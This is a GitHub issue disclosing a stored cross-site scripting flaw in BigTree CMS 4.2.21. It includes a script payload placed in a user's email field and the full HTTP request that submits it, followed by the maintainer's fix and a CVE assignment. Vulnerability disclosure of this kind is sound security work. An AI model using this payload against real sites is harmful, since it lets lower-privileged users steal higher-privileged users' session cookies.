Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-site Scripting (XSS) in bigtreecms 4.2.21 #328

Closed
CHYbeta opened this issue Feb 23, 2018 · 7 comments
Closed

Cross-site Scripting (XSS) in bigtreecms 4.2.21 #328

CHYbeta opened this issue Feb 23, 2018 · 7 comments

Comments

@CHYbeta
Copy link

CHYbeta commented Feb 23, 2018

#The low-privileged(administrator) users can use this vulnerability to attack high-privileged(Developer) users.

For example,there are two users:

The low-privileged(administrator) users can add user and set the email-value to “temp%40temp.com</section><script>alert(document.cookie)</script><section>

POST /site/index.php/admin/users/create/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/site/index.php/admin/users/add/
Cookie: PHPSESSID=nvnhr6d2d81e5gaihbv2nour72; bigtree_admin[email]=test%40administrator.com; bigtree_admin[login]=%5B%22session-5a903c07dad732.86432365%22%2C%22chain-5a903c07dabd79.93509025%22%5D
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 179

__csrf_token_XGF2TDMDYBQ3VME5N1288EG4AFFHFWW1__=5BEIptU0KCCaG7YqSi6aqf%2F5L70Kuq51GbVgn3e8vVg%3D&email=temp%40temp.com</section><script>alert(document.cookie)</script><section>&password=temp&level=0&name=temp&company=temp&daily_digest=on

When the high-privileged(Developer) user view users,he will be xssed:

Thank you!
email: chybet4@gmail.com

timbuckingham added a commit that referenced this issue Mar 5, 2018
@timbuckingham
Copy link
Collaborator

Thanks, should be fixed in the next release!

@attritionorg
Copy link

@timbuckingham Can you link to the fixing commit please?

@timbuckingham
Copy link
Collaborator

It's referenced above, but here it is again:
b652cfd

@attritionorg
Copy link

@timbuckingham doh sorry! was digging around the branches looking for it and totally spaced it. thanks!

@CHYbeta
Copy link
Author

CHYbeta commented Apr 6, 2018

Is there a CVE-ID for this XSS issues?

@timbuckingham
Copy link
Collaborator

There is no CVE assigned that I am aware of, you can request one here: https://iwantacve.org/

@fgeek
Copy link

fgeek commented Dec 25, 2018

CVE-2018-1000521 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants